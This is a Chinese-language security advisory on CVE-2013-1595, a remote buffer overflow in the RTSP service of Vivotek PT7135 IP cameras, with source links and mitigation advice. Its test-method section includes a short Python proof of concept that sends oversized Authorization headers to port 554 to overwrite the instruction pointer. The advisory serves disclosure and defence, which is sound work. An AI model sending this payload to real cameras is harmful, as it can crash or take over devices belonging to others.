多个Vivotek IP摄像机远程缓冲区溢出漏洞(CVE-2013-1595)

多个Vivotek IP摄像机远程缓冲区溢出漏洞(CVE-2013-1595)

发布日期：2013-04-30
更新日期：2013-05-02

受影响系统：
Vivotek PT7135 IP camera 0400a
 Vivotek PT7135 IP camera 0300a
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 59573
 CVE(CAN) ID: CVE-2013-1595
 
Vivotek是网络视频解决方案提供商。
 
Vivotek IP网络摄像头存在远程缓冲区溢出漏洞，通过向RTSP服务发送特制的报文，报文头字段Authorization完全用字符a (0x61)填充，攻击者可用0x61616161覆盖IP寄存器。
 
<*来源：Francisco Falcon
        Nahuel Riva
 
  链接：http://seclists.org/fulldisclosure/2013/Apr/252
        http://www.coresecurity.com/advisories/vivotek-ip-cameras-multiple-vulnerabilities
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
import socket, base64

 cam_ip = '192.168.1.100'
 session_descriptor = 'live.sdp'

 request = 'DESCRIBE rtsp://%s/%s RTSP/1.0\r\n' % (cam_ip, session_descriptor)
 request+= 'CSeq: 1\r\n'
 request+= 'Authorization: Basic %s\r\n'
 request+= '\r\n'

 auth_little = 'a' * 1000
 auth_big = 'a' * 10000

 msgs = [request % auth_little, request % auth_big]

 for msg in msgs:
    s = socket.socket()
    s.connect((cam_ip, 554))
    print s.send(msg)
    print s.recv(0x10000)
    s.close()

建议：
--------------------------------------------------------------------------------
临时解决方法：
 
如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：
 
* 除非需要，不要将摄像机联网。
 * 如果可能，过滤RTSP流（默认端口554）。
 * 在HTTP请求中，至少有一个代理过滤 /../../ 、getparam.cgi
 * 对 farseer.out 的每个请求，过滤参数 system.ntp 内的字符串。
 
厂商补丁：
 
Vivotek
 -------
 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
 
http://www.vivotek.com/web/product/NetworkCameras.aspx